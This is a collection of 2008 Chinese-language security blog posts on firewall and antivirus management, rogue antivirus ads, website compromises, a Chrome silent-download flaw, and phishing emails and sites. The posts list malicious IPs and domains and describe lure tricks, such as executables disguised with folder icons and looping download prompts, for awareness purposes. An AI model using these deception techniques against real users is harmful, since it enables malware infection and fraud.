我還是要在強調，資安防護是一場組織戰，有了戰略與策略之後，如何把資安防護組織起來，對抗外在的風險與威脅，甚至發掘內在的弱點與威脅因子，這是很重要的一個過程。

經常忽視的重大議題：
1.Policy 程序
只有建立 Policy 的程序，卻沒有真正的所謂的「維護」，所有資安設備在維護階段是很重要的一環。網路開通了以後就不管了，變萬年規則，這是很常見的網管觀念，然後就是等出事才會去理它，哪...能不出事的唄。
2.整合資訊安全政策或網路政策
Policy 的建立，幾乎沒有整合或結合所謂的資訊安全政策或網路政策等。防火牆管理者知道哪些 Policy 是不能開設的嗎？如果沒有，防火牆就會大開後門了。最常見的，明明就是獨立、隔離網段，但防火牆卻有開後門做管理。
3.管理權責劃分
防火牆、網路、系統管理的權責劃分。如果有一個人身兼多份工作，這個人就極可能成為企業虛擬世界中的神。所以要注意權責劃分問題。
4.Outbount控管
很多防火牆管理者只重 Inbount 的管理，卻疏於對 Outbount 的管理，但這不是防火牆管理者的錯，因為，從來就沒有人說要管的。
5.Policy複雜且異動頻繁
Policy 設定過多、且異動頻繁，這都是一個嚴重警訊。防火牆的政策英文是用 Policy ，就是不能朝令夕改的。

企業防火牆管理觀念：
1.防火牆與網路架構為一體，但先要有網路架構在佈署防火牆，因為，在網路規劃時就要有資訊安全的觀念，防火牆是實現資安的策略之一，也是極重要的關卡，不能輕忽之。如果防火牆 Policy 失守，等同網路架構失守。
2.資訊安全政策或網路政策...等，與防火牆也會密切相關，也會有關於防火牆管理的規則、條文，如隔離網段就是隔離網段，有些 Policy 就是不能開放設定的，所以，一切「依法行政」就對了。防火牆管理者是否清楚知道哪些是不能開的。如有窒礙難行，務必尋求資安推動小組或管理階層反應，進行相關規則、條文的修改，甚至需要調整網路架構的。
3.防火牆 Policy 設定、作業流程，相關申請、修改、刪除的程序需要明訂，並建立覆核機制，這整個流程機制需要經得起考驗的；這部分在需多稽核單位或人員上都已經有特別要求，就是做的任何申請、修改、刪除的程序要有跡可循，所以這比較會有共識，但很重要的一點：法條是需要人去遵守的，法條有值得人遵從嗎？
4.防火牆已開放的通訊埠(Port)就需要有配套加強防護或管制，無論 Inbount(防護)或 Outbount(管制)皆是。這是非常重要的觀念，防火牆是用來開放通道的，用這點去想就對了。
5.防火牆的好朋友-虛擬私有網路(Virtual Private Network, VPN)，VPN 管理與防火牆管理觀念相當類似，後續會再針對 VPN 管理加以說明，如要避免防火牆 Policy 異動過於頻繁，請務必善用 VPN 來輔助防火牆管理，也只有透過 VPN 管理才能達到更好的安全性。另外，我深深覺得 VPN 應該用來內部使用的，而非 Internet 使用。
6.防火牆連線記錄的報表管理。啥...防火牆要出報表，不要懷疑，能出的好連線記錄報表，可以發現很多資安事件的。雖然防火牆有報表功能，但多半沒有太大用處的，且目前並沒有太多的工具，甚至是分析軟體，所以需要花費點功夫的。最基本的連線記錄報告，是可以回頭稽核防火牆管理，明明是獨立網段卻有連線記錄，這樣不就抓包了；如果功力好還可以查覺惡意程式的連線行為，是屬於未知惡意程式哩，千萬別小看防火牆記錄的威力。重要的是你想要哪些分析報表呢？
7.防火牆系統運作、稽核記錄與稽核報表。主要是相關人員登入登出記錄與統計、防火牆異動記錄統計、系統負載流量記錄統計，甚至運作異常的統計分析...等。這些都是健康與內稽的重要數據指標。
8.有部電影：防火牆(Firewall)，官方網址在這裡，這裡跟這裡有中文介紹。避免「人」成為弱點，就需要權責劃分。如果一個人管防火牆、網路兼系統...這個人等同企業網路的神了。
9.其實，防火牆管得好不好，防火牆管理者最清楚；最怕是防火牆管理已經經手多次，而經手人都是一團亂帳，哪就無力扶正，也無從匡正了。

防火牆明明已經是很成熟的產品了，但...它的管理似乎不是哪麼成熟，為啥會這樣咧？你得好好想想。其他還有很多資安產品的，你又管好了嗎？話說回來還是人才的問題。

偽裝防毒軟體的網站真多！還有內情！

2008-09-14T22:55:00.006+08:00

之前就有貼一文：偽裝成防毒軟體網站

建議大家要找防毒軟體可以到這裡，是有提供免費線上掃毒的。
這裡是免費線上間諜程式掃描的。
最後這裡有些各種免費的安全相關軟體。希望大家有爭大眼睛的哩。

在做些分析時，發現有些好玩的，這篇文章也想跟大家說這類網站真多，實在無法窮舉，google 搜尋一些詐騙、釣魚網站，結果"Sponsored Link"都指到相同網站哩，看看下面三張圖：

所以用 google 查詢下列關鍵字：
totalsecure2009.com
smart-antivirus-2009.com
smart-antivirus-2009-buy.com
都會查詢到"www.free-web-browsers.com"的贊助連結。

再追查下去，會發現更多：

清查結果還真不少是唄，而且還是一直在換網域的，不過目前主要是這幾個 IP：
78.157.143.251
91.203.92.26
91.203.92.25
有興趣的可以自己查查，不過這只是釣魚網站的部分喔。下圖，是贊助連結的網頁，目前是還沒有發現有惡意的行為，但剎那不是永恆喔，切記。<廣告詞千萬不能信...ccc>

本來想做些「網站信譽評等」的，但...坦白說我還是比較相信自己的，大家要培養自己的網路警覺性才行。另外偷偷告訴大家，91.203.92.xx 這網段真是黑，黑到底了，怎說，看看這裡吧，Exploits、Malware calls home、Zlob、Rogue、Trojan...幾乎啥壞事都幹盡了。

結論：
1.網路上真的有壞人。你的警覺性咧！
2.你認為這些主機在哪呢？ Hosting...yes!! trouble!!<下次你 Hosting 的網段有一堆客戶連不上，千萬不要訝異>
3.壞人總是用不完的網域(Domain)，咦，好人也可以用哩...XD。
4.關鍵字搜尋結果、贊助網頁或贊助廣告連結，千萬要小心，先前有提過囉。
5.上述2.3.4.都是要花錢的喔。你認為他們從哪裡賺回來呢？

本文同步張貼於：阿碼外傳

企業防毒管理 (Enterprise Anti-Virus Management)

2008-09-14T11:37:00.003+08:00

這篇延續整理先前的貼文：企業防毒管理，因為先前是有感而發的寫，這次重新整理一下內容。

防毒軟體，這應該有用電腦的都耳熟能詳了，但，你真的了解你正在使用的防毒軟體嗎？你的使用者真的了解使用的防毒軟體？我的標題是用"Anti-Virus"，但我是想要用"Anti-Malware"的，怕 Malware 範圍太大了，所以，還是鎖定最基本的"Anti-Virus"部分。
在各種資安防護佈署上，這項是跟使用者最密切的，所以當然也要強化對使用者的教育訓練。但，無奈的是我不見有防毒原廠有在做這樣的事，都只強調"安裝"自家的防毒軟體就能高枕無憂。外面有一堆防毒軟體的討論版，卻不見防毒原廠與使用者直接溝通，不能再說了，不然又離題了...XD。
另外，我經常把惡意程式比喻成彈頭，因為人家都把子彈打到你家裡了，你的網路環境充滿子彈嗎？哪你家裡就是戰場囉！在戰場上救傷兵都來不及了哩；不過大多數的人應該是變戰場而不自知吧，搞不好連傷兵都沒在救的...XD。如果，你已經在做彈道分析了，那得恭賀您，步入開發國家或已開發國家之列囉！

對於防毒軟體，使用者必須要學會的項目：
1.知道防毒軟體是否在正常運作，如何確保其運作。
2.知道病毒碼是否為最新，如何可以使病毒碼更新。
3.知道如何查詢發現惡意程式的記錄，甚至一些警訊或異常記錄。
4.防毒軟體的發現惡意程式訊息、畫面的解讀，知道哪些情況是異常的。
5.當發現無法刪除或持續同樣警訊時，該通報的方式或該如何處置。
6.是否有進階功能可以利用，如用戶端防火牆、反間諜...等。
7.可以自行完成安裝防毒軟體，這是最好的。
以上，如果你的使用者不會，哪相關資訊單位就要負責上述所有工作項目；很多單位會採用年度採購防毒軟體時，另包含工讀生負責上述項目，我只能說這也是很不負責任的做法。我認為它是使用者在網路生存的基本技巧，配合使用者教育訓練，強化基層資安觀念才是上上之策，否則，使用者根本不該上網(瀏覽網際網路網頁)及使用E-Mail，既然享權力當然要盡義務的。

常見企業防毒管理上的問題：
1.伺服器與使用者主機管理需要加以區分，並優先關注伺服器主機群。當伺服器主機群發現惡意程式，等同入侵行為。
2.進行數據化報告產出，並進行統計分析。但防毒系統幾乎不能產出你要的數據，我只能說防毒原廠的報表功能糟透了。這些數據是管理上很重要的指標。
3.系統管理人員有徹底發揮防毒功效嗎？首先你的系統管理者了解防毒觀念嗎？
4.須針對經常性發現惡意程式之主機予以關注，對經常中毒的使用者予以強化資安之教育訓練。
5.防毒管理不能只靠一道防線，除了用戶端的防毒軟體，其他經常使用的 HTTP、FTP、SMTP、POP3...等，應採用適當的防毒閘道建立第二道防線，甚至，多道防線。
6.配套的惡意程式防堵策略，這部分得先了解哪些管道是惡意程是最常入侵的管道，當然，你得先了解自己的網路環境，還有外在的威脅。最簡單或基本的配套，例如禁止執行檔的下載，這有的防火牆就可以做了。
防毒工作不是只有建置，只要是資安防護措施都是需要維護管理的。

企業的防毒管理觀念：
1.多層次、多配套策略來建構防線，而用戶端防毒是最後一道防線。
2.每道防線都需要產出數據化資訊。
3.強化所有防線或策略，需要以最後一道防線數據來觀察其成效。
4.觀察每道防線的數據，注意其變化。
5.有專人檢視每份數據，並進行調整及強化作業。
6.如果沒有好的最後一道防線，將無法發掘真正問題點。
7.未發掘(未知)的惡意程式，是否有找查或抑制的機制。
8.嘗試了解惡意程式滲透之管道，並設法加以阻隔。
以上，簡單的說就是，在你的環境總共發現多少惡意程式呢？分別被哪些防護所偵測發現？惡意程式的類別、運作型態？入侵管道？可能未被發現的惡意程式估計？IR (Incident Response)人員發現多少未知惡意程式？...這些應該都要在你的掌控之中，不是嗎？

以下主要是些奇想，因為，防毒部分還有很多事可以做的。而防毒原廠似乎都不務正業，企業用戶也只能牙癢癢的，不是嗎？我想企業用戶要去要求原廠，這年頭告訴人家用哪家防毒軟體就是一個漏洞，你認為人家不知道你用哪家廠牌的防毒軟體嗎？你也不可能三天兩頭把用戶端的防毒說換就換吧！所以，客製化功能刻不容緩，進階強化功能設定是可以依據不同客戶需求，強化客戶的資安防護作業，這樣，企業用戶才有更多策略來抵禦外在威脅的。因為，每台 PC 都有一套軟體了耶！不能有小雲端的功能嗎？它一定能做更多事情的。

企業防毒中控端的需要功能(強調中控端就可以做，不是要在用戶端進行的)：
1.查殺惡意程式可自救。
2.分析用戶端系統的工具或記錄不可少。
3.有客製化的服務功能(依據客戶有量身訂做的特定服務功能)。這問題是，你知道哪些功能是你需要的。
4.報表數據要能符合需要，並能呈現現況。這點比較大的問題是，要產生哪些報表，防毒原廠可不會幫你想的。
5.有惡意程式分析(SandBox)功能。
6.能夠整合其他防禦設備進行協同防護，如與防火牆、入侵偵測、入侵防護...等設備，進行封鎖或阻擋行動。
7.創意，對付創意的有心人士，也只能靠創意了。

我對企業防毒中控端功能的期望：
1.有所有用戶端處於執行中檔案的MD5,SHA-1...等資訊，能第一時間查殺，而不需要等原廠製作病毒碼。
2.能主動查詢用戶端的網路連線、執行程序狀態...等，並可進行檢查或統計分析工作。
3.對於重要主機可以做執行程序、自動啟動(Auto-Start)途徑變更的比對功能，或其變化的紀錄。
4.透過中控端可遠端取得用戶端執行中之檔案複本，進行分析、檢測之用，檢測是否為"未知"惡意程式。
5.各種客製化的門檻或條件設定，做為警示或提醒作用。
6.各種客製化的數據及報表的產出設定，做為分析之用。
7.有惡意程式分析功能，找出特定網路行為，找出其他可能被相同駭客集團控制的主機。
8....

深思網站淪陷背後的意義

2008-09-13T14:57:00.005+08:00

有許多地方都有網站淪陷的相關記錄：
Zone-H.org：http://www.zone-h.org/
中国被黑站点统计系统：http://www.zone-h.com.cn/
Zone-H 本週被黑 .tw 網站整理：http://outian.net/zone-h/
TW 網站淪陷資料庫 | 資安之眼：http://www.itis.tw/compromised
Turk Hack World Analyse and Attack Mirror Service：http://turk-h.org/
Serapis.net：http://www.serapis.net/
XSSed: XSS (cross-site scripting) information and vulnerable websites archive：http://www.xssed.com/archive
PhishTank：http://www.phishtank.com/

另外還有「天罣--輪迴的阿修羅」(這應該是最完整的，以台灣地區而言)，最知名的應該是「大砲開講」：http://rogerspeaking.com/

幾乎每天都有許多網站被淪陷或者被利用，很多網站管理者對這些記錄是恨得牙癢癢的，甚至，連被爆料的組織、單位主官也是牙癢癢，因為，記錄就是記錄，記錄永遠在哪裡。
我很喜歡看《CSI犯罪現場：邁阿密》，維基百科有詳細介紹，但它另外的紐約及拉斯維加斯系列的影集我就沒哪麼喜歡了。在邁阿密系列中的主角"何瑞修·肯恩(Horatio Caine)"除了有招牌動作外，還有一句常說的話：「那些記錄，只是你最小的問題」，我也想借用這句話。為何？如下：

1.公佈的記錄是發現時間，漏洞存在多久了呢？
這問題不知網站管理者及權責主管是否有想過呢？我是光想這問題就快瘋了，很多單位都迅速地給我第一回應：「沒關係，我這台機器上沒有重要的資料」，嘿，老兄，我都還沒問哩。況且，這台機器可以當跳板，滲透更多內部主機的。其實，這問題你知道的，面對現實與真相吧！別讓你的網站一直在裸奔...

2.其間是否另有人滲透進來，擷取他想要的資訊了呢？
這問題可大了，查起來可要人命哩，是否有人力處理這部分呢？需要花多少時間及多少人力，甚至外聘需要花多少預算，查出結果可能還要再花一筆預算，這是管理階層第一個要考慮的。真查出了結果，可能真得有人....。所以，九成九不會想知道這結果的。但深入去查，往往會有收穫，了解災損範圍是極重要的一環，因為，還可以查覺整體防禦架構上的漏洞，進而加以改善。詳細了解災損，才能進一步做應變處理，如果個資或客戶資料外洩，該如何修補及因應呢？使用者或客戶出現客訴該如何回應？萬一上媒體又該如何？這再再都與企業形象緊密結合。可以看看我們政府單位的因應...囧rz

3.被公布的記錄，會引起其他有心人士的念頭
這是公開的記錄，大家都會知道，但若沒有這些記錄，你會哪時才知道網站出狀況了；這會不會讓你想到另外一個問題呢？對，會不會你的網站已經出事了，看看這則消息：台灣網站遭受有史以來最大規模SQL Injection 攻擊，這是五月份的事，google 搜尋"9i5t.cn"字串，還有一堆網站沒有清除遭植入的惡意字串，還是很多人是不知道自己網站已經出事，所以被公佈出來是好是壞就見仁見智囉。接下來，網站漏洞問題修復的時間就是關鍵，但往往漏洞問題都找不到，還要如何修復呢？我只能說不修復，「有心人士」還會來複檢的；另外，公開的記錄鐵定也會引來更多「有心人士」的，因為，它代表有漏洞存在，沒理由別人找得到而我卻找不到漏洞，如果找不到哪不就遜掉了，結果就是有更多人來挑戰你的網站。千萬別有僥倖的心態。

4.免費的滲透測試(PT)，只是沒給你報告
往好處想，這大概是唯一的。另外，是否還有其它網站有相同漏洞存在？如何避免再次發生？都是該思考的問題。既然已經有人幫你點出問題，就要一次把相關問題根除，借力使力、化危機為轉機。可以看看我之前的貼文，千萬不能低調過頭。

5.真的有確實做好漏洞修補作業嗎？
這一點我得特別拿出來再說一次，「移除入侵痕跡」不等於漏洞修補，況且，就連「移除入侵痕跡」也不夠徹底，只移除了表相，如置換的首頁、安插的頁面或字眼，但 WebShell (網頁木馬、網頁後門)可不是這麼容易找的。最重要的，網站淪陷背後的成因往往也沒有加以探究，找到漏洞問題，修補是不是確實呢？這中間有一連串的三道關卡：異常復原、徹底清除及漏洞修復，你完成了嗎？

6.最後，到底誰在為網站安全負責，這才是最大問題。
是網站管理者、系統管理者、程式開發者、網管人員、資安人員、稽核人員、資料處理人員...還是使用者。先不用急著找答案，我們先把範圍擴大，觀念同樣擴及到企業或組織的資訊安全誰該負責，我想這大家都知道就是CIO(資訊長)、CSO(安全長)。所以要由管理角度來看的，因為每個企業或組織架構不同，也會有不同權責與權限，但無論如何管理者要要負最大責任，至於誰該負責：
a.擁有控管權力、有能力主導網站的人：大多企業或組織都沒有這號人物，有誰在為網站安全把關。
b.賦予控管權限的人：這個人當然是管理階層，如果沒有a.的人物，企業或組織的管理者當然要負全責。
相關資訊安全人員的角色及應有功能與職責可以參考這裡。

另類廣告行銷手法

2008-09-11T20:36:00.009+08:00

這幾天發現部落格有個新留言：

我以為女粉絲來著...XD
看了一下相關資訊：

Wow !!辣妹來著呀，看看文意...Orz
「What is your thrill ??? The answer is: Play Online Poker. NOW !!!」

問了一下谷歌大神：

自 9/7 ~ 9/11日就有三千多人瀏覽，這帳號七月註冊至今也有四萬三千多人瀏覽。哇~~熱門來著哩。

連結的網站：

結論：
1.廣告來著，天上掉下來的...可能是禮物，也可能是沱....鳥屎！
2.留言板張貼色情或賭博廣告手法，並不算太新，還頗常見，尤其是色情廣告。
3.這就是網際網路，啥人都有...無聊、有心人士通常都是ＯＯＸＸ，而人類歷史最悠久的兩種文化：賭博及色情，永遠都沒有國界，而且還是共通語言哩。
4.這廣告手法還結合賭博及色情，手法真好。
5.充分利用人性，夾雜「好奇心」的驅使，才能一窺堂奧。
6.不用花大成本的廣告，短時間也有不少人查閱哩...。

最後，我把這留言砍了！看圖，看上面的就好...XD

「Google Chrome」瀏覽器實戰釣魚網站！敗~~

2008-09-03T22:51:00.004+08:00

Google推出新的瀏覽器了，目前是測試版，有很多新聞，可以看這裡、這裡還有這裡。如果想嘗鮮可以到下列網址下載安裝：
http://www.google.com/chrome

想知道目前這瀏覽器的市佔率，可以看這邊。看起來應該頗受大家看好，才有這統計數據，目前顯示將近 2%。

新的瀏覽器對有心人士來說，就是新戰場，貼切點就像是 Wii、PS3 或 iPhone 推出一樣，迫不及待的拆開把玩，所以，今天(9/3日)開放下載，馬上就有人推出攻擊：Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability。
POC 網址在這裡。

所以我們拿「Google Chrome」來實戰釣魚網站，這釣魚網站很常見的詐騙伎倆，大家不可不防的，實戰結果卻有點跌破眼鏡；所以，使用前還是要得先熟悉產品，不然會出事。這裡摘錄精彩片段予以重播，Pitch by Pitch...！

釣魚網站有目前有兩個連結，可以參考先前 POST 的文章：
1.實戰釣魚網站(A)：主要運用騙術。
2.實戰釣魚網站(B)：除了騙術，還有些玩弄小程式，你能脫身嗎？

所以直接把 Google Chrome 瀏覽器，連線釣魚網站看看會有啥結果：
(A)網站瀏覽結果，發現桌面上馬上多一個檔案，一開始還真的嚇一跳哩，瀏覽畫面如下。怎會發生這款事勒...

桌面多出的一個檔案，有心人士可是千方百計才有這結果的哩：

(B)網站瀏覽結果，經過一連串網頁的煩人訊息後，發現桌面上也多一個檔案，瀏覽畫面如下：

同樣的，在循環的訊息過程中也無法將瀏覽器關閉，最後桌面也多出的一個檔案：

仔細想想發生啥事...大家應該也猜到發生啥事了！沒錯，「預設在下載檔案時」是沒有下載訊息的喔...XD，設定畫面如下，該不該打勾呢？我想你應該在這實戰釣魚網站過程中，知道會發生啥事了吧！順便複習一下釣魚網站的技倆。

如果沒勾，你的電腦可能會多出一堆檔案的哩，這瀏覽器的下載檔案的過程及訊息都跟 IE 及FireFox 不太一樣的，有沒有發現呢？站在「方便使用」的立場，或許相當人性化，但資訊安全往往站在「便利」的另一端，該如何取決，你得做出選擇。

這個漏洞也已經陸續有相關披漏了，可以參考下列網址：
Google Chrome Browser 0.2.149.27 Automatic File Download Exploit
Google Chrome Automatic File Download

本文同步張貼於：阿碼外傳

你！出賣朋友嗎？

2008-08-31T23:36:00.005+08:00

Web 2.0時代，「你」確實是主角，但你可能會無意間出賣朋友還不自知。當然，某些程度這樣的說法確實有些嚴重，但有些網站的手法我真的很不欣賞。

有一個商業網站：zorpia.com

有繁體中文的網站，在香港：

網站中有下面這個頁面：

可以看一下中文的註冊頁面。
所以「你」可以用 msn、Yahoo、gmail、AOL 的帳號及密碼註冊，但你知道這也意味著甚麼嗎？

「你」已經把你的帳號密碼大辣辣就直接告訴人家了，也把你的通訊錄的朋友給賣了。你警覺到了嗎？
「Population of Zorpia: 11341232 | Zorpians Joined Yesterday: 7528」...首頁上有註明一些資料的。

於是你的朋友就會收到下列郵件：

一個接一個的大家都把朋友給賣了...

我很不高興的是，寄件者就是你認識的人，但郵件內容卻是第三者的立場及說法，這樣的方式是可以唬弄一堆人的。來看一下郵件標頭：

看得出哪還有線索嗎？Return-Path 是 "zorpia.com" 的哩！

結論：
1.冒用你認識的人寄 E-Mail 給你，這就不用說了。這是很差勁的一點。
2.郵件退件並不會退件到你的信箱，當然是不想讓你知道，因為你會收到一些郵件的退件的，然後可能會起疑。
3.郵件的內容又是第三方的立場。講的一副事不關己的樣子。
4.重點是「出賣朋友」。

看一下幾個信譽評等網站對"www.zorpia.com"評等結果：
Norton Safe Web, from Symantec - report for zorpia.com
Google Safe Browsing diagnostic page for www.zorpia.com
WOT Security Scorecard | WOT Web of Trust
來自 McAfee SiteAdvisor 網頁安全評等
至於可不可信賴，注意，還是要靠自己來決定。它們可以提供一些資訊，但是，「你」的警覺性才是最重要的，因為別忘了Web 2.0的時代「你」才是主角。
其它還有許多網站千方百計要竊取你的 msn、Yahoo、gmail、AOL 的帳密，很多是釣魚網站，講到這有沒有想起一些釣魚網站咧，不是有些網站說可以「查看你的即時通有誰把你給刪除嗎？」，這些全都是騙人的把戲；利用一些包裝及手法，兩下就都把帳號密碼給人家了，還是「你」自己給人家的...你知道嗎？

我可以花三百，把我自己的個資買斷回來嗎？

2008-08-27T20:04:00.007+08:00

這兩天，五千萬筆個資外洩的新聞可熱鬧了，詳細的蘋果文圖並茂、Yahoo!奇摩新聞、yam天空新聞、IThome、刑事警察局還有其他新聞。
還有一些資安網站的消息：大砲開講、資安之眼。

看完只能無言 ................................................................Orz

遭駭單位/竊取資料
中央健保局：就醫紀錄、繳費資料
中華郵政：個人帳號、帳戶金額
東森購物：個人資料、信用卡帳號
中華電信：通話對象、個人資料
遠傳電信：通話對象、個人資料
教育部：學經歷、家庭資料
資料來源：刑事警察局偵九隊 -壹貳蘋果網路

看一下官方說法(後續會再補充的，網路都有當事人澄清專線喔)：
個資遭駭？健保局：比對中應是其他單位出問題
「中央健保局表示，目前還在與警政署密切聯絡比對中，不過初步比對，並無發現有醫療資料外洩，尤其中央健保局資料庫屬封閉專屬網路資料庫，應不會遭駭客入侵，如果外漏資料屬實，會追是否為投保單位或人為疏失、蓄意犯罪。」...意思是說我沒被入侵呀，封閉網路怎可能？就算會也是外包或內賊洩漏的。
中華郵政：網路郵局個資未遭駭客入侵
「...研判網路郵局發生異常的交易可能是客戶端的電腦遭入侵，客戶個人資料外洩所造成...在網站關閉後就沒有發生帳戶被盜用現象，因此研判網路郵局的防護機制仍然安全...被盜用的帳戶都是輸入帳號和密碼進入交易，在郵局來看都是循正常途徑登入...」...嗯，官腔看不懂，網路郵局個資未遭駭客入侵，其他的就？？外洩的又不確定是網路銀行資料。如果數量龐大，使用者中毒的還真多。還有資料外洩不一定只靠木馬及後門喔！

含淚還是要擠出個@#$：
1.每筆個資三百元不是賤賣，已經是極高檔的行情，地下行情每筆個資十元已經是高價，有的一筆只有幾塊錢哩。現在知道做詐騙的成本夠低吧，啥都漲的年代這可沒漲。
2.有五千萬筆資料，台澎金馬只有兩千三百萬，可以做資料的交叉比對囉，搞不好還有除錯的功能哩。
3.每筆三百元，資料庫的個資有重複，打個折扣也有一千五百萬個資(健保局資料應該就兩千萬筆了)。算起來市值可有四十五億耶。資料還可以重複賣Ｎ次喔。
4."破獲兩岸駭客、詐欺集團"...屁啦！這是抓到的是總經銷商，個資在對岸都還有一份耶(標準異地備援哩)，所以上下游都還沒清出來哩。願意當總經銷的人大有人在。
5.個資已經外洩也追不回來了，如何因應？自求多福。我們政府收的稅金是不含這部分的服務，不會幫你做這因應的喔。大家務必要有警覺性了，畢竟有個資當只能基礎架構，還是需要詐騙的方式或過程來取得$$。不然，你就要有密帳，帳戶要在國外喔，如果沒有人爆料就比較安全。

利用「關鍵字廣告」的詐騙--已經在google出現

2008-08-24T13:20:00.003+08:00

先來看看一些消息：
iThome online：小心關鍵字廣告連結惡意網頁
ZDNet Taiwan：關鍵字廣告成網路釣魚工具
資安人：Yahoo！奇摩關鍵字洩個資！
Sunbelt Blog：The continuing problem of malware being advertised in Google Adwords
刑事警察局：兩岸駭客設置變種網路釣魚網站竊取網路銀行等企業大量個人資料
資安之我見：偽裝成防毒軟體網站

去年「關鍵字廣告」的詐騙在我們這就已經相當夯了，鬧得沸沸揚揚，所以google上也是一定會有的事；最近國外開始利用了，畢竟，這類手法得花些成本的，所以沒有計畫就做，很容易賠老本哩...XD。既然人家都花錢做了，我們也應該欣賞一下囉！順便中英手法比較一下有啥不同呢？

我們這是「利用yahoo關鍵字」的手法，先來恢復一下記憶：

這手法在2006年底就出現了...到2007年二月才爆發出來。

這是哪家銀行咧，看得出來嗎？正牌銀行也是受害者的。

前面兩個是分類廣告不用錢的，這個是「贊助網站」要錢的哩！

上面這些廣告連結都是餌，會連結到駭客「控制」的網站，利用網頁掛馬的方式，使瀏覽者的電腦植入惡意程式，再利用植入系統的木馬，竊取個人金融資料，盜領帳戶金額。
簡單的說就是在大型搜尋網站買下「關鍵字廣告」行銷，蒐尋「網路銀行」、「航空公司」、「旅行社」、「電腦科技公司」、「人力銀行」等關鍵字會有五十多個假網頁，誤點連結的就可能被植入木馬程式，竊取個人信用資料和帳號密碼，進行盜轉存款、預借現金、小額付費、網路購物等盜領洗錢犯罪。

國外是「利用google adware」的手法，來看看幾張圖：

#Sponsored Links(贊助商連結)

#Sponsored Link(贊助廠商廣告)

#Ads by Google(Google提供的廣告)，一般網站有提供google廣告的

看出端倪了嗎？知道上面連結或廣告的差異嗎？「Sponsored Links(贊助商連結)」、「Ads by Google(Google提供的廣告)」及google搜尋的結果，都是可以利用的，搜尋出來的網站可能就是釣魚網站。
我想十之八九都是很難分辨的，所以才會有一堆所謂的「網站信譽評等軟體」來幫你挑出已知有問題的網站；要特別注意的是有列出來的九成九是有問題，沒列出來的也有可能是有問題的，可以參考最後一段。

連上網站，看起來就像是一個防毒軟體的網站，如果下載安裝，結果安裝的會是惡意程式。網站的樣子可以參考這。

結論：
1.必須強調，兩手法都是有計畫的行動，註冊網域及贊助廣告...都是要花錢的。
2.以細膩度而言，「利用yahoo關鍵字」手法勝出，因為它一開始就是短期大量，所以設計的手法較細膩。
3.以延續性而言，「利用google adware」手法勝出，因為它有釣魚網站的基礎，所以可以打持久戰。
4.「利用yahoo關鍵字」手法利用的都是"別人"的網站，且利用瀏覽器漏洞植入惡意程式，再偷取個人資料的攻擊主軸。
5.「利用google adware」手法完全使用騙術，簡單的說就是騙你是防毒軟體，要你下載檔案安裝，但實際安裝的是惡意程式。
6.是否夾帶其他手法，我想一定有的，至少釣魚郵件就是很好的利用管道。

這裡也整理一下有哪些「網站信譽評等軟體」：
*McAfee SiteAdvisor
http://www.siteadvisor.com/analysis/
*Trend TrendProtect:TrendProtect is a FREE browser plug-in that helps you avoid Web pages with unwanted content and hidden threats.
http://www.trendsecure.com/portal/en-US/tools/security_tools/trendprotect
*Firetrust Sitehound: prevents visits to malicious websites, phishing, spyware, exploits, scams, fraud and more.
http://www.firetrust.com/
http://www.firetrust.com/en/products/sitehound
*Haute Secure: free software to protect your computer from malware
http://hautesecure.com/
*Scandoo: based on ScanSafe's web security technology
http://www.scandoo.com/
*Web Security Guard: Lets you review a website's content, threat level and brief description before you enter it.
http://www.websecurityguard.com/
*WOT, short for "Web of Trust," is a community whose members exchange knowledge of websites: Can they be trusted?
http://www.mywot.com/
*Finjan SecureBrowsing provides you with safety ratings of URLs showing in your browser.
http://securebrowsing.finjan.com/
*Norton Safe Web is a new reputation service from Symantec. Our servers analyze Web sites to see how they will affect you and your computer.
http://safeweb.norton.com/

夾帶惡意附件檔案的釣魚郵件出現了

2008-08-21T14:27:00.007+08:00

郵件主旨：Record in debit of account
夾帶附件的釣魚郵件出現了...我還一直在想啥時會出現哩！釣魚郵件如下圖：

之前老師不是有講，網頁連結跟附加檔案都是餌！你有沒有在聽！丟筆...

好！我們平心靜氣，還是要看一下附件檔案（注意：開啟附件或點選連結都是危險動作），壓縮檔案夾一個執行檔（.exe），相當傳統的手法。

把檔案丟到VirusTotal上的結果：24/36 (66.67%)

看一下郵件標頭（Header）：

結論：
1.郵件內容都是英文，沒有網頁連結。所以沒有其他手法，有的還會夾個連結，連結到釣魚網站。
2.夾帶檔案就壓縮檔，解壓縮後是執行檔，純騙術，沒有看到漏洞攻擊的手法。手法還不夠細膩，如果解壓後的圖示，換成資料夾圖示應該會唬到更多人...
3.整個手法之前在yahoo信箱很常出現，可以到這舉報討論版看看，因為網路拍賣的關係，在取得相關買賣人的郵件信箱後（目前yahoo雖然把相關信箱隱蔽，但還是有不少人大剌剌得把郵件信箱貼出來），寄出一些夾帶自動解壓縮且執行的檔案，來誘騙相關人去點選、執行。
4.比較需要注意的是，如.rar, .pdf, .doc, .ppt...等，其中Office文件檔案經常被利用來夾帶惡意攻擊碼的，目前國外釣魚郵件還沒利用這類的文件漏洞攻擊，但遲早會利用的；反到是我政府單位經常受到這類郵件攻擊，可以參考最近的新聞、政府單位發布的消息，所以務必切記危險動作。
5.我的預感：夾帶文件檔案的應用程式漏洞攻擊，快出現了，而且會利用0-day漏洞，成功機率才會大幅提升。

模擬實戰釣魚網站

2008-08-16T15:12:00.003+08:00

最近釣魚郵件多到不行，可以參考這篇新聞，看來 Mass SQL Injection 之後，再結合釣魚郵件搭配釣魚網站的手法交互運用，可以參考之前 POST 的一篇文，只能說「有心人士」用盡心思，推出的嘔心瀝血之作啊。
所以，我們當然要用欣賞的角度來看囉！面對創意的人，我們當然要投以藝術眼光的啦...

下面有兩個實作釣魚網站經常利用的「概念」與「創意」：(此兩網站並無惡意程式)
1.實戰釣魚網站(A)：主要運用騙術。
2.實戰釣魚網站(B)：除了騙術，還有些玩弄小程式，你能脫身嗎？
解答在後面...

實戰釣魚網站(A)：
劇本就是"你需要看影片的程式，要你下載安裝"，就這簡單。
下載檔案後的樣子...
有發現異狀嗎？這可是絕妙的陷阱耶，偽裝成資料夾的圖示。點兩下開啟資料夾就變成執行程式喔。

注意它實際上還是執行檔的喔。所以檔案圖示是可以唬人的，有些會偽裝成壓縮檔或播放程式的圖示，像是 rar, zip, flash 的檔案，賊吧。

實戰釣魚網站(B)：
這個劇本就比較狠的，會有訊息告訴你說你需要安裝元件，且訊息就跟真的一樣；另外，會不會發現畫面關不掉，讓你一直在循環中，就是要你下載程式。
下載檔案後的樣子...
也是一個美輪美奐的檔案，會不會忍不住執行、安裝它咧...

